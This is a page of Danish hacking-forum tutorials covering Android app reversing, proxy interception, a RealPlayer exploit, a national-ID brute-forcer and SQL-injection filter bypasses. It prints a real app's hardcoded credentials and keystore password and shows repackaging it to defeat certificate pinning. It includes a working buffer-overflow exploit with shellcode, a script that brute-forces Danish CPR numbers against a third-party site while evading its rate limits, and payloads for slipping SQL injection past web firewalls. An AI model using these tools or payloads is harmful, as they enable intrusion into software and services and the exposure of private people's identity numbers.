Shellsec - Vejledninger

Android Decompiling/Reversing

Fri, 11 Jul 2014 19:38:02 +0200

Introduktion til Android Hacking

I denne korte introduktion til Android hacking kigger vi på den basale opsætning til at få lidt mere styr på hvordan vi decompiler Android applikationer,
samt hvordan vi igennem en proxy kan opfange oplysninger om, hvad data applikationen sender videre til dennes tilknyttede backend server.

Krav

Android SDK + Eclipse ADT (Eclipse + Android Development Tool(kit) er kun hvis du ønsker at køre en emulator i stedet for en fysisk enhed,
samt hvis du ønsker at dykke lidt længere ned i Android programmering samt patching/cracking)
http://developer.android.com/sdk/index.html

Java JDK & JRE (JDK er den vigtige her, men JRE er brugbar til visse opgaver)
http://www.oracle.com/technetwork/java/j...index.html

Charles Proxy (Kan være hvilket som helst proxy tool du har erfaring med)
http://www.charlesproxy.com/

APKTool (Skal bruges til at decompile + recompile (Smali - Baksmali) dine APK filer)
https://mega.co.nz/#!10UHnAxC!zLg6ucEf43...YVOkd9rHy0

SignAPK (Eller jarsigner - Skal bruges til at signe APK filerne, så de kan installeres på Android styresystemet.
Langt de fleste enheder vil ikke installere applikationer Uden denne hersens underskift)
https://mega.co.nz/#!ZklzhYhZ!g0ZcCd1epr...At1nTWyJ7g

Dex2Jar (Konverterer .DEX filen der er pakket ind i .APK filen til .JAR.
https://mega.co.nz/#!Jh0AkayZ!hzmJx-gRpf...MylPdap-zA

Jd_Gui (Giver dig en pæn brugerflade til at læse .JAR filerne fra Dex2Jar)
http://jd.benow.ca/

Så Hvad Er En APK-Fil?
En APK er sådan set bare et pakkeformat ligesom RAR og ZIP. Du kan endda omdøbe din .APK til .ZIP og herved åbne og udpakke indholdet.
APK-formatet er bare hvad Google har valgt at kalde deres applikationers filtype, sådan at Android styresystemet kan genkende det.

Det er disse filer du downloader og installerer, når du henter en app i Google Play eller andre tredjeparts app butikker.
Hvis du har en Rooted Android enhed, kan disse filer kopieres som "backups" og smides over på computeren via ADB, Email, Dropbox osv.

Desuden kan du bruge online downloaders såsom http://download.freeapk.ru/en eller http://apkleecher.com/ til at hente filerne ned til nærmere undersøgelser.
Pas dog på med det, da mange af disse downloaders først lige smider spyware eller reklamer ind før gør dit download-link klar.

Mappestruktur
Lad os for en god ordens skyld lave en mappe på skrivebordet der hedder Android
Inde i den mappe udpakker vi følgende filer til deres egne mapper:
Desktop/Android/APKTool
Desktop/Android/SignAPK
Desktop/Android/Dex2Jar
Desktop/Android/Jd_Gui.exe (Ingen mappe, så bare smid i den i Android mappens rod)

Opsætning af Emulatoren
For at gøre det så let som muligt bruger vi Eclipse til åbne AVD (Android Virtual Device Manager).
Sørg for at Android SDK er installeret, samt at Eclipse er udpakket (Det er lige meget hvor).
1) Åbn Eclipse > Window > Preferences > Android og tjek om 'SDK location' passer til hvor du installerede/udpakkede Android SDK og tryk OK.

2) Gå til Window > Android SDK Manager Og installer alle de pakker den selv foreslår (Samt tjek at du har mindst én af de nyeste platforme - Android 4.3 osv - installeret - Dette kræver til tider Administrator rettigheder)

3) Gå til Window > Android Virtual Device Manager > Tryk på 'Create' og udfyld indstillingerne.
Disse indstillinger er ikke så vigtige lige nu, og kan hele tiden ændres. Har selv mange forskellige, men her er et eksempel:
Det kan være en fordel at hente Google API's i SDK Manager'en, da flere applikationer ellers vil fejle installationen grundet en 'manglende delt pakke'.

Tryk OK > Og start så emulatoren.

!! Der kan opstå tilfælde hvor vores ADT plugin ikke er installeret korrekt, i disse tilfælde gør følgende:
Gå til Help > Install New Software >
Tryk på Add >
Giv den et navn (ADT Plugin) >
Angiv en URL til plugin-filerne > https://dl-ssl.google.com/android/eclipse/
Og installer så Android Development Tools. Dette kan igen til tider kræve administrator rettigheder.

Installation af Applikationer til Emulatoren
Sørg for, at du har emulatoren åben og kørende.
Åbn CMD/Kommandovinduet og CD til mappen mappen hvor du installerede Android SD/platform-tools.

C:\Windows\System32> cd C:\sdk\platform-tools
ELLER gå til Android SDK mappen, Hold Shift-knappen nede og højreklik på platform-tools > "Åbn kommandovindue her".
I denne mappe gemmer adb.exe sig, og det er dette lille fikse program vi vil bruge til at installere applikationer og køre aktiviteter/services.

Som et eksempel vil jeg bruge Verisure's fjernstyrrings app til tyverisikring/overvægning.
Hvis vi går til https://play.google.com og søger efter denne applikation.
( https://play.google.com/store/apps/details?id=com.sdi.mobile.android.verisure )
kan vi se i adressebaren, at pakkenavnet er: 'com.sdi.mobile.android.verisure'
Her kan vi så gå videre til http://download.freeapk.ru og skrive pakkenavnet/adressen og downloade .APK-filen hurtigt og uden problemer, i stedet for at hente den ned på vores enhed, installere, tage backup og overføre filen til vores computer.
Gem .apk-filen Android mappen.

For at installere denne app skriver vi blot

Citer:adb install

(Du kan skrive adb install og herefter bare trække filen ind i kommandovinduet for automatisk at udfylde stien til filen.
Dette bliver således til:

Citer:C:\sdk\platform-tools>adb install C:\Users\MXI\Desktop\Android\verisure.apk
1112 KB/s (7109188 bytes in 6.240s)
pkg: /data/local/tmp/bas.apk
Success

Nu er applikationen så installeret på emulatoren, og kan findes inde i Apps menuen.

!! I tilfælde af at adb ikke kan finde din emulator enhed kan det til tider hjælpe at forwarde:

Citer:'C:\sdk\platform-tools>adb -d forward tcp:5601 tcp:5601'

!! Prøv herefter at skrive

Citer:'C:\sdk\platform-tools>adb devices'

for at se om den har registreret din enhed.

Opsætning af Charles Proxy
Installér Charles Proxy (Dette er kun en trial, så den låser op nogle sekunder engang imellem, og kan kun køre i 30 minutter før det lukker ned. Kan dog åbnes igen med det samme)

Gå til Proxy > Proxy Settings og tjek portnummeret (Højst sansynligt 8888)
Under fanen Proxies skal du lige tjekke om der er flueben i 'Enable transparent HTTP proxying'.
Under fanen SSL skal du lige tjekke om der er flueben i 'Enable SSL proxying'.
Hvis den her kræver en opsætning under 'locations', så tryk add og OK med tomme værdier.

Find din netværks-IP (Ikke din eksterne IP, men din interne IP routeren bruger til at finde dig på netværket)

Dette kan gøres på flere forskellige måder, men den letteste er IMO at skrive ipconfig i kommandovinduet, og kigge under IPv4:

Citer:C:\Windows\System32>ipconfig

Lad os vende tilbage til Android emulatoren for at opsætte Charles.

Først hopper vi lige ind i Androids browser nede i højre hjørne (Blå planet-tingy).

Gå til http://charlesproxy.com/charles.crt > Giv certifikatet et navn og tryk OK for at installere det. (Dette skal bruges til at opsnappe SSL trafik)

Der er forskelle i brugerfladen på forskellige Android versioner, men i min (4.4.2) er det således:
Gå til Settings (Tryk på Menu knappen, eller find den inde i Apps menuen)
Under Wireless & Networks tryk på More...
Tryk på Mobile Networks > Access Point Names
Tryk på den APN der allerede er i brug (T-Mobile US hos mig)
Tryk på Proxy, og indsæt den IP vi fandt før (192.168.1.105)
Tryk på Port og indsæt porten fra Charles (8888)
Disse indstillinger vil muligvis kræve et kodeord (Dette kodeord/PIN vil også blive krævet til at logge ind næste gang du starter emulatoren, så ingen grund til at gå i panik hvis den lige pludselig kræver Pinkode næste gang)
I øverst højre hjørne - Udfra 'Edit access point' er der 3 vertikale firkanter, tryk på disse og vælg 'Save'

Nu vil netværksaktiviteten fra din Android emulator automatisk blive kørt igennem Charles - Det samme vil din browseraktivitet i Windows dog også - For at undgå dette kan du trykke på Proxy > Og fjerne fluebenet i 'Windows Proxy'.

Decompile Android Applikationer

Ved Hjælp af APKTool

Åbn et kommandovindue i APKTool mappen (cd C:/... eller højreklik > Åbn ko..) og skriv følgende:

apktool d(står for decompile)

Altså noget i stil med dette:

Citer:C:\Users\MXI\Desktop\Android\>apktool d C:\Users\MXI\Desktop\android\verisure.apk verisuredecom
I: Baksmaling...
I: Loading resource table.
I: Loaded.
I: Loading resource table from
I: Loaded.
I: Decoding file-resources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...

Nu har vi så de decompilede .smali filer i 'verisuredecom' mappen, som kan ændres/pacthes/crackes og recompiles.
At patche diverse dele af koden er ikke noget jeg synes vi skal begive os ud i, da dette kun er en simpel introduktion
(Og smali er pænt svært at forstå hvis man bare lige hopper ud i det - det er simpelthen alt for let at ødelægge det bare ved at fjerne en enkelt funktion/variabel, og glemme at starten af funktionen så smali er klar over der er den satan mindre)

Lad os i stedet tage et kig på 'AndroidManifest.xml' filen som er i roden af 'verisuredecom' mappen. Denne fil er det berygtede manifest, der indeholder oplysninger om f. eks. pakkenavn, egenskaber, version, aktiviteter, services, tilladelser, broadcast receivers, intents osv.
Manifestet giver næsten sig selv, og efter 10 minutters nærstudering + google vil det meste give mening. Hvad vi er interesserede i her, er hvilke services, intents og aktiviteter(activities) der er angivede.
I dette eksempel er der ikke nogle services eller intents der ser ud til at kunne hjælpe os, men der er nogle spændende aktiviteter. Den aktivitet mine øjne først sprænger på er denne:

Citer:

. Uha. Der er altid en mulighed for, at classes/aktiviteter med navne som dev/developer/programmer/coder kan indeholde noget spændende.
DeveloperActivity.smali er placeret i ..\verisuredecom\smali\com\sdi\mobile\android\verisure - Men igen er smali altså for viderekomne, og passer dårligt ind i en intro.

Lad os istedet prøve noget andet. Vi kan bruge adb shell's am kommando(activity mamager) til at starte aktiviteter

Lad os prøve at åbne det kommandovindue vi brugte til at installere applikationen med (Android SDK/platform-tools)
I dette kommandovindue skriver vi først adb shell

Citer:C:\sdk\platform-tools>adb shell
root@generic:/ #

Herefter skriver vi am start <pakkenavn>/.<aktivitet>

Citer:root@generic:/ # am start com.sdi.mobile.android.verisure/.DeveloperActivity

Og boom. Vi har started en aktivitet direkte fra kommandovinduet/konsollen. Dette kan bruges til forskellige ting, f. eks. gemte menuer og aktiviteter der glemmer at tjekke om brugeren er logget ind, og herved lækker information der kun burde være forebeholdt autoriserede brugere.

OBS! For at komme tilbage fra vores shell kan vi trykke CTRL+C
!! Hvis du her får en fejlmeddelse i stil med følgende:
!!error: protocol fault (no status)
!!Så skriv >adb kill-server
!!efterfulgt af >adb start-server

Ved Hjælp af Dex2Jar

Åbn et kommandovindue i dex2jar mappen (cd C:/... eller højreklik > Åbn ko..) og skriv følgende:

Citer:C:\Users\MXI\Desktop\Android\>d2j-dex2jar C:\Users\MXI\Desktop\android\verisure.apk

Dette vil decompile Androids .DEX dalvik byte code til Java, og være noget lettere at forstå. verisure-dex2jar.jar filen kan nu åbnes i jd-gui.exe.
Du kan dog ikke ændre i koden og gemme det, men i stedet bruge koden til at få oplysninger om applikationens indhold, samt mulige hulder i programmeringen.

Efter en lille gennemgang af den decompilede kode finder vi igen den spændende klasse med navnet DeveloperActivity, som ovenikøbet indeholder følgende hardcoded credentials:

Citer:
dd.a(this, "[b]mm-test1@verisure.com", "asdf1234");[/b]

Skulle vi prøve at se om de virker? Sørg for Ikke at køre Charles når du forsøger dette.

Sørme jo. Der er ikke meget at komme efter her, men det er da en vej ind for at få lidt bedre viden om hvordan applikationen virker.

Hvis vi på nuværende tidspunkt har Charles åben vil vi få en fejl, da verisure bruger en form for SSL Pinning, der gør at forbindelsen bliver nægtet hvis ikke SSL certifikatet er ens hos både klienten(android) og serveren(I dette tilfælde Charles, som herefter videregiver trafikken).

Igen ville det være lidt overkill at begynde at fjerne dette tjek eller bytte deres http klient ud med vores egen. Men måske engang i fremtiden. ;)

( Hvis det alligevel skulle have interesse er der her to gode artikler om emnet: http://www.mcafee.com/us/resources/white...dation.pdf
http://www.exploit-db.com/wp-content/the.../33430.pdf )

Jeg vil dog alligevel lige vise en lille sjov ting jeg fandt i denne applikation, som også vil give anledning til at recompile.

Ved at kigge på klassen \com\sdi\mobile\android\util\http\httpservice.smali, der hjælper med forbindelsen til backend-serveren, finder vi følgende:

Java:

Citer: private static void b(Context paramContext)
{
b = new a(new ByteArrayInputStream(a(paramContext.getResources().openRawResource(2131099649))), "mysecret");
d = c(paramContext);
}

Smali:

Kode:
new-instance v1, Ljava/io/ByteArrayInputStream;

    invoke-direct {v1, v0}, Ljava/io/ByteArrayInputStream;->([B)V

    .line 74

    new-instance v0, Lcom/sdi/mobile/android/util/http/a;

    const-string v2, "mysecret"

    invoke-direct {v0, v1, v2}, Lcom/sdi/mobile/android/util/http/a;->(Ljava/io/InputStream;Ljava/lang/String;)V

    sput-object v0, Lcom/sdi/mobile/android/util/http/HttpService;->b:Lcom/sdi/mobile/android/util/http/a;

Vi har altså her at gøre med en string der bruges i samarbejde med en ressource(RAW) der smides ind i en inputstream. Hmm..
Lad os tage et kig på vores ressourcer (Den blev loaded fra RAW). Under \verisuredecom\res\raw finder vi sørme en fil med navnet mykeystore.bks, som er en filtype der bruges til at importere certificater fra BouncyCastle.
Kan det virkelig passe de bare har hardcoded deres key/password? altså....

Vi skal altså bruge BouncyCastle til at optette et certifikat i stil med det vi fandt i raw mappen.
http://www.bouncycastle.org/ - Et velkendt krypterings-library.
Jeg har her valgt at bruge 'bcprov-jdk15on-146.jar' til denne opgave.

Til dette skal vi bruge 'keytool', som befinder sig i JDK's Bin mappe:

Citer:'C:\Program Files\Java\jdk1.7.0_51\bin'

Åbn en konsol i denne mappe, og indtast følgende for at lave en ny BouncyCastle .bks keystore fil:

Citer:keytool -importcert -v -trustcacerts -file -alias sslshit -keystore -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath -storetype BKS -storepass

Kode:
C:\Program Files\Java\jdk1.7.0_51\bin>keytool -importcert -v -trustcacerts -fil

 "C:\Users\MXI\Desktop\apk\charles.crt" -alias sslshit -keystore "C:\Users\MXI\Desktop\apk\verisuredecom\res\raw\mykeystore.bks" -provider org.bouncycastle.j

e.provider.BouncyCastleProvider -providerpath "C:\MXI\MXI\Desktop\apk\bcprov

jdk15on-146.jar" -storetype BKS -storepass mysecret

Owner: C=NZ, ST=Auckland, L=Auckland, O=XK72 Ltd, OU=http://charlesproxy.com/ss

, CN=Charles Proxy SSL Proxying

Issuer: C=NZ, ST=Auckland, L=Auckland, O=XK72 Ltd, OU=http://charlesproxy.com/s

l, CN=Charles Proxy SSL Proxying

Serial number: 1

Valid from: Sun Dec 31 13:00:00 CET 1899 until: Fri Sep 24 05:19:05 CEST 2038

Certificate fingerprints:

         MD5:  D5:E8:27:14:9B:A1:5E:AC:85:02:B5:93:93:6D:9A:83

         SHA1: 18:9B:6E:28:D1:63:5F:3A:83:25:E1:E0:02:18:0D:BA:2C:02:C2:41

         SHA256: C6:A5:94:B2:53:0F:EF:2E:AE:85:1B:91:62:CD:CD:42:EB:B1:BE:A5:E2

6B:A3:1F:81:6C:03:22:40:33:30:9E

         Signature algorithm name: SHA1withRSA

         Version: 3

Extensions:

#1: ObjectId: 2.16.840.1.113730.1.13 Criticality=false

0000: 13 68 53 53 4C 20 50 72   6F 78 79 69 6E 67 20 69  .hSSL Proxying i

0010: 73 20 65 6E 61 62 6C 65   64 20 69 6E 20 43 68 61  s enabled in Cha

0020: 72 6C 65 73 20 50 72 6F   78 79 2E 20 50 6C 65 61  rles Proxy. Plea

0030: 73 65 20 76 69 73 69 74   20 68 74 74 70 3A 2F 2F  se visit http://

0040: 63 68 61 72 6C 65 73 70   72 6F 78 79 2E 63 6F 6D  charlesproxy.com

0050: 2F 73 73 6C 20 66 6F 72   20 6D 6F 72 65 20 69 6E  /ssl for more in

0060: 66 6F 72 6D 61 74 69 6F   6E 2E                    formation.

#2: ObjectId: 2.5.29.19 Criticality=true

BasicConstraints:[

  CA:true

  PathLen:2147483647

]

#3: ObjectId: 2.5.29.15 Criticality=true

KeyUsage [

  Key_CertSign

]

#4: ObjectId: 2.5.29.14 Criticality=false

SubjectKeyIdentifier [

KeyIdentifier [

0000: BB 27 F4 CB 2E B6 DB B0   58 10 1B BD 80 3F 38 D2  .'......X....?8.

0010: 08 D7 61 29                                        ..a)

]

]

Trust this certificate? [no]:  yes

Certificate was added to keystore

[Storing C:\Users\MXI\Desktop\apk\verisuredecom\res\raw\mykeystore.bks]

Nu skulle certifikatet altså være gemt i KeyStore filen, og hvis vi nu recompiler vores decompilede smali filer, burde vi ikke få problemer med Charles.

Recompiling Decompiled Smali Filer

Her skal vi igen tilbage til APKTool kommandovinduet / Eller starte en ny, hvis den er lukket ned.
I kommandovinduet skriver vi følgende:

Citer:apktool b(står for build)

Hvilket ser således ud:

Citer:C:\Users\MXI\Desktop\Android\>apktool b C:\Users\MXI\Desktop\Android\verisuredecom verisurerecompiled.apk

(Her kan vi nøjes med at skrive 'verisuredecom' som mappe, da vi allerede arbejder fra Android mappen.

Citer:C:\Users\MXI\Desktop\apk>apktool b verisuredecom verisurerecompiled.apk
I: Checking whether sources has changed...
I: Smaling...
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs...
I: Building apk file...

Det er sådan set alt der skal til for at recompile filerne. Disse skal dog 'signeres/underskrives' før Android styresytemet tillader at de bliver installeret.

"Signering" af Recompiled Applikationer
Denne process er heldigvis også utroligt hurtig.
Ved hjælp af vores trofaste kommandovindue CD'er eller åbner vi op i SignApk mappen, hvor signapk.jar gemmer sig.
SignApk køres ved hjælp af Java, og behøver kun ganske få parametre.
Vi vil her benytte os af de "nøglefiler" der er med i zip-filen, da der ikke er brug for selv at lave nye til dette formål.

Skriv følgende i kommandovinduet, som du har åbnet/ændret sti til SignApk mappen:

Citer:java -jar SignApk.jar

Som med mine filer vil være således:

Citer:java -jar signapk.jar testkey.x509.pem testkey.pk8 verisurerecompiled.apk verisuresigned.apk

Efter blot få sekunder er den nye fil signeret, og befinder sig i signapk mappen.

Installering af Modificerede Applikationer
Da vi brugte SignApk erstattede vi nøglen med en ny, så vi kan ikke 'opdatere' vores applikation. Vi er her tvunget til først at afinstallere applikationen, og herefter installere den nye version.
Dette kan gøres i emulatoren inde under Settings > App > Vælg applikationen (Verisure) > Uninstall - Eller - Ved hjælp af vores elskede adb shell med følgende kommando:

Som Doctor Blue så fint lige fik påpeget, så er den letteste og hurtigste måde at afinstallere applikationer på, helt klart ved at benytte adb uninstall

Citer:C:\sdk\platform-tools>adb uninstall com.sdi.mobile.android.verisure

Citer:C:\sdk\platform-tools>adb shell
root@generic:/ # am start -a android.intent.action.DELETE -d package:com.sdi.mob
ile.android.verisure
on.DELETE -d package:com.sdi.mobile.android.verisure <
Starting: Intent { act=android.intent.action.DELETE dat=package:com.sdi.mobile.a
ndroid.verisure }

Herfra er der bare at installere den nye signerede apk, ved hjælp af samme kommando som vi brugte i starten:

Citer:C:\sdk\platform-tools>adb install C:\Users\MXI\Desktop\android\SignApk\verisuresigned.apk

Nu er applikationen så installeret, og hvis vi først åbner Charles og herefter Verisure, kan vi nu se at alt SSL trafikken bliver kørt igennem Charles uden et eneste problem.
Herfra kan vi så se at brugernavn/pasword bliver sendt som Base64, samt vi får diverse oplysninger om hvordan de forskellige anmodninger og svar er strukturerede på serveren.

Charles og andre proxies kan i nogle tilfælde være rigtig godt til at lave SQL injections i f. eks. POST parametre, som de fleste ellers bare hopper over.

Skal nok lige få rettet de værste fejl, og så skal billederne lige prioriteres da boardet er sat til maks 10.

Skal nok også få smidt lidt simpel patching ind engang.

*Nix debugger GDB cheat sheet

Sat, 05 Jul 2014 23:24:06 +0200

Cheat sheet til GDB (stnd GNU-debuggeren)
http://darkdust.net/files/GDB%20Cheat%20Sheet.pdf

Uanset erfaring, vil jeg mene det er hjælpsomt :).

Lær at bruge mitmproxy

Mon, 30 Jun 2014 23:28:58 +0200

Hej dejlige venner fra Shellsec! Her er en guide fra mig omkring hvordan du bruger værktøjet mitmproxy! Det er et FUCKING LÆKKERT værktøj hvis du fx. Har brug for at se hvilke HTTP requests din telefon laver i en app!

Installering af mitmproxy

Først og fremmest skal din computer have pip installeret. Hvis du ikke har det, kan du se hvordan du installere pip her https://pip.pypa.io/en/latest/installing.html

Så skriver du

Kode:
pip install mitmproxy

Venter på at det bliver installeret og yada yada yda. Lad os så komme i gang!

Sådan bruger du mitmproxy

Du skriver bare mitmproxy i terminalen og programmet vil starte således.

Nu har du en http-proxy ready to go! Yæsh! Du kan se hvilke requests der bliver lavet ved at få diverse programmer til at tilgå en proxy på din port 8080

Og nu forestiller vi os lige at vi har lyst til at se hvilke http-requests ekstra-blads-appen på vores iPhone laver. (Det er primært hvad jeg har brugt den til)

mitmproxy på din iPhone
Uha! Anyways. Din computer og din iPhone skal begge være logget på det trådløse netværk. Du starter mitmproxy på din computer og tager din iPhone frem. Så gør du følgende.

1. Tag din iPhone frem
2. Gå ind i settings -> Wifi -> Dit trådløse netværks navn
3. Scroller helt ned i bunden til http proxy, vælger manual
4. Indtaster din computers ip og port 8080.

5. Går ud og tjekker mitmproxy på din computer. (evt gå ind i en app der tilgår internettet)

Og bam! Lækre data.

JAMEN MR. DARKNIGGA, JEG VIL HA DATA DER TILGÅR EN SSL FORBINDELSE!.. Fra min iPhone! Fino, min ven. Så tjek den her guide.
http://mitmproxy.org/doc/certinstall/ios.html

Håber i kunne bruge min guide. :--)

Hvis i ikke kan lide mitmproxy er Charles Proxy måske et bedre alternativ.. :--)

RealPlayer 16.0.3.51 version overflow SEH PoC

Tue, 14 Jan 2014 21:15:17 +0100

Sad lige og legede med RealPlayer da jeg havde set på exploit-db at der var en buffer overflow.

Buffer overflow opstår i programmet når den et sted prøver at læse versions nummeret som er defineret i filen med:

Kode:

Der er 2 offset for at lave et succesfyldt exploit. Jeg har dog kun dækket det når man åbner filen fra menuen.

Når man dobbeltklikker på .rmp filen vil man bruge nogle andre offset. Dette kunne godt tilføjes til nuværende, men magtede ikke at lave det. Opdatere måske med det.

Tror vidst nok jeg rammer min nopsled, da jeg ikke hopper helt præcist. Som i kan se er bufferen med shellcode lagt lige inden mine jmps.

Testet på Windows XP sp3 eng

Shellcode er genereret med

Kode:
./msfvenom -p windows/exec CMD=calc -f python -b '\x0a\x00\xf0\xad\xc4\xe7\x8f\xfe\x62\xfd\xde\xdf\xc8'

Dette åbner som i kan se, calc



openh = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"

closeh = "\x22\x3f\x3e\x3b"



buf =  ""

buf += "\xbf\x67\x53\x20\x02\xdd\xc1\xd9\x74\x24\xf4\x58\x2b"

buf += "\xc9\xb1\x32\x31\x78\x12\x83\xc0\x04\x03\x1f\x5d\xc2"

buf += "\xf7\x23\x89\x8b\xf8\xdb\x4a\xec\x71\x3e\x7b\x3e\xe5"

buf += "\x4b\x2e\x8e\x6d\x19\xc3\x65\x23\x89\x50\x0b\xec\xbe"

buf += "\xd1\xa6\xca\xf1\xe2\x06\xd3\x5d\x20\x08\xaf\x9f\x75"

buf += "\xea\x8e\x50\x88\xeb\xd7\x8c\x63\xb9\x80\xdb\xd6\x2e"

buf += "\xa4\x99\xea\x4f\x6a\x96\x53\x28\x0f\x68\x27\x82\x0e"

buf += "\xb8\x98\x99\x59\x20\x92\xc6\x79\x51\x77\x15\x45\x18"

buf += "\xfc\xee\x3d\x9b\xd4\x3e\xbd\xaa\x18\xec\x80\x03\x95"

buf += "\xec\xc5\xa3\x46\x9b\x3d\xd0\xfb\x9c\x85\xab\x27\x28"

buf += "\x18\x0b\xa3\x8a\xf8\xaa\x60\x4c\x8a\xa0\xcd\x1a\xd4"

buf += "\xa4\xd0\xcf\x6e\xd0\x59\xee\xa0\x51\x19\xd5\x64\x3a"

buf += "\xf9\x74\x3c\xe6\xac\x89\x5e\x4e\x10\x2c\x14\x7c\x45"

buf += "\x56\x77\xea\x98\xda\x0d\x53\x9a\xe4\x0d\xf3\xf3\xd5"

buf += "\x86\x9c\x84\xe9\x4c\xd9\x7b\xa0\xcd\x4b\x14\x6d\x84"

buf += "\xce\x79\x8e\x72\x0c\x84\x0d\x77\xec\x73\x0d\xf2\xe9"

buf += "\x38\x89\xee\x83\x51\x7c\x11\x30\x51\x55\x72\xd7\xc1"

buf += "\x35\x75"











print len(buf)



eip = "\xd9\xee\x1e\x64"

jmp_bck_5 = "\xeb\xf9\xcc\xcc"





jmp_bck_446 = "\xe9\x3d\xfe\xff\xff"

jmp_bck_650 = "\xe9\x71\xfd\xff\xff"

jmp_bck_197 = "\xe9\x36\xff\xff\xff"

jmp_bck_224 = "\xe9\x1b\xff\xff\xff"



payload = openh + "\x90" * (13595-len(buf)) + buf + jmp_bck_224 + jmp_bck_5 + eip + "\x43" * 16394 + "\x44" * 10000 + closeh



sploit = open('hax.rmp', 'w')

sploit.write(payload)

CPR Finder - Outdated VIP stuff

Wed, 04 Dec 2013 23:15:29 +0100

NOTE: Dette er en gammel VIP tråd som jeg har oprettet her fordi den ikke længere virker. Dog kan folk stadig se på den for educational purpose

Jeg har kodet denne Python CPR Finder.
Den finder CPR numre på ca 1-5 minutter.
Brug Python 2.x for at bruge det.

Den side jeg kodede det til havde en limitation. Det var at man maks måtte have 2 opslag per navn. Dog måtte man have én fejl i navnet.
Det udnyttede jeg ved at lave et map med ascii chars også genere navne med kun én fejl i. Det vil sige at systemet ikke registrere at det er samme navn selvom det er.

Nyd det, og lad nu være med at dele med andre end jer VIP's.
Hvis folk kan finde ud af at holde det privat, kun for VIP's så gider man også dele noget en anden gang :)



import urllib, urllib2



print "\n\nCPR Finder v 0.3 by Morph3s@shellsec for ShellSec VIP.\n\n"

print "Programmeret en sen aften da en bruger anmodede det."

print "Programmet er for educational purpose only og jeg, Morph3s, er ikke ansvarlig for misbrug"

print "Videre distribution af programmet til andre end Shellsec VIP er forbudt og medfoerer permanent ban fra shellsec\n"







name = raw_input('Indtast navnet paa den oenskede person(Etc. Mark Hansen):')

bday = raw_input('Indtast deres foedselsdag i format DDMMYY(Etc. 150190):')

gender = raw_input('Koennet paa personen(M for mand, K for kvinde):')



print "Vi soeger nu efter: " + name

print "Foedselsdag: " + bday

print "Koen: " + gender



corr = raw_input('Er dette korrekt?(j/n):')



if "n" in corr:

	print "Qutting"

	exit(0)



if "j" in corr:

	print "Super! - Vi forstaetter!"



url = 'https://www.greentel.dk/index.php?ajax=true'





if "m" in gender:

	num4 = {'1','3','5','7','9'}



if "k" in gender:

	num4 = {'0','2','4','6','8'}







num1 = {'0', '1', '2', '3', '4','9'}

num2 = {'0','1','2','3','4','5', '6', '7', '8', '9'}

num3 = {'0','1','2','3','4','5', '6', '7', '8', '9'}

charmap = ['!', '"', '#', '$', '%', '&', '(', ')', '*', '+',

			',','-','.','/','0','1','2','3','4','5','6','7','8',

			'9',':',';','<','=','>','?','@','[',']','^','_']

count = 0

indcount = 0;

reacount = 0;



namear = list(name)



for a in num1:

	for b in num2:

		for c in num3:

			for d in num4:

				

				## Name obfuscation to bypass limitation

				for char in charmap:

						

					if len(name) == (indcount-1):

						print "Not enough randomization. Add chars to charmap"

						print reacount

						exit(0)



					if charmap.index(char) == count:

						namear = list(name)

						if namear[indcount]!= " ":

							namear[indcount] = char

						else:

							indcount = indcount + 1

						break

					if count >= len(charmap):

						count = 0

						indcount = indcount + 1

						break	

						

					







				## Validating through the use of modulu 11

				numbers11 = list(bday+a+b+c+d)

				modulus11 = [4,3,2,7,6,5,4,3,2,1]

				trig = 0;

				total = 0;

				for y in range(0,10):

					total += int(numbers11[y])*modulus11[y]



				







				# Verifies that modulu is correct. If it is, then send request

				# - to site



				if total%11 == 0:

				

					

					reacount = reacount+1

					print "Testing this CPR: " + bday + a + b + c + d

					print "This is attempt number: " + str(reacount)

					print "This is the name: " + "".join(namear)

					count = count + 1

				



					##Setting up data and posting to site

					values = {'up_ajax_action' : 'do_address_check',

		          			  'cpr' : bday+a + b + c + d,

		          			  'fullname' : "".join(namear),

		                          '13246578' : '' }

					data = urllib.urlencode(values)

					req = urllib2.Request(url, data)

					response = urllib2.urlopen(req)

					

					the_page = response.read()

					print the_page



					if "firstname" in the_page:

						the_page = response.read()

						print "Found the info!"

						exit(1)

						

					

					



print "It took " + str(reacount) + " tries!"

Hvordan man omgår WAF.

Tue, 03 Dec 2013 23:57:03 +0100

I dag vil jeg skrive om hvordan man kan bypass WAF filtre.

Før du går i gang SKAL du have en viden i SQLi .

Så lad os starte ..

Hvad er WAF eller Web Application Firewall ?
- En webapplikation firewall ( WAF ) er en appliancen , server plugin, eller filter, der anvender et sæt regler til en HTTP- samtale. Generelt dækker disse regler over nogle fælles angreb såsom cross-site scripting (XSS ) og SQL Injection. Ved at tilpasse reglerne til din application, kan mange angreb identificeres og blokeres.

Nogle website bruger WAF -filter.
Hvis du har fundet en vuln websteder, der har WAF og du forsøge at injecte et Uinon baseret forespørgsel og den forspørgsel ikke er acceptabelt vil der forkomme en 403 fobidden eller Web Application Firewall advarsel.. Det betyde at forespørgslen eller syntaks, som du injecter er der et WAF-filter ellers er det Blokeret af WAF .

Ok nu her er nogle metode til at omgå WAF filtre.

1 ) Kommentarer :

SQL comments er en velsignelse for os SQL injections. De giver os mulighed for at omgå en masse af de begrænsninger som web-applikation firewalls, sætter til at dræbe visse SQL-sætninger, som bruges af hackeren til at udføre, angreberns SQL injection. Nogle comments i SQL :

Kode:
/ / , ? , / ** / , #, ? + , ? - , ;

2) Sag Ændring :

Nogle WAF's vil kun blokere små angreb.
Som vi kan se, kan vi kan nemt omgå dette ved lidt forandringer ? :
Mulig Regex filter:

Kode:
/union\sselect/g

id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)

3) Inline commands :

Nogle WAF s filters nøgleord som / union \ sselect /ig. Vi kan så omgå dette filter ved at bruge inline commands det meste af tiden, ved mere komplekse eksempler kræver det mere avancerede metode eks. tilføje SQL commands, der yderligere vil adskille de to ord til :

Kode:
id=1/*!UnIoN*/SeLeCT

Læg mærke til udråbstegn. / * ! code * / Udråbstegnet udfører vores SQL-sætning.
Inline commands kan bruges i hele SQL-sætningen, så hvis tabel_navn eller information_schema bliver blokkeret af nogle filtreres kan vi bare tilføje flere inline commands. For eksempel, lad os sige et websites filtrer blokkere følgende union,where, table_name, table_schema, =, and information_schema Det er 3 eksempler, og vi skal infiltere vores mål .
Til dette ville vi gøre sådan her:

Kode:
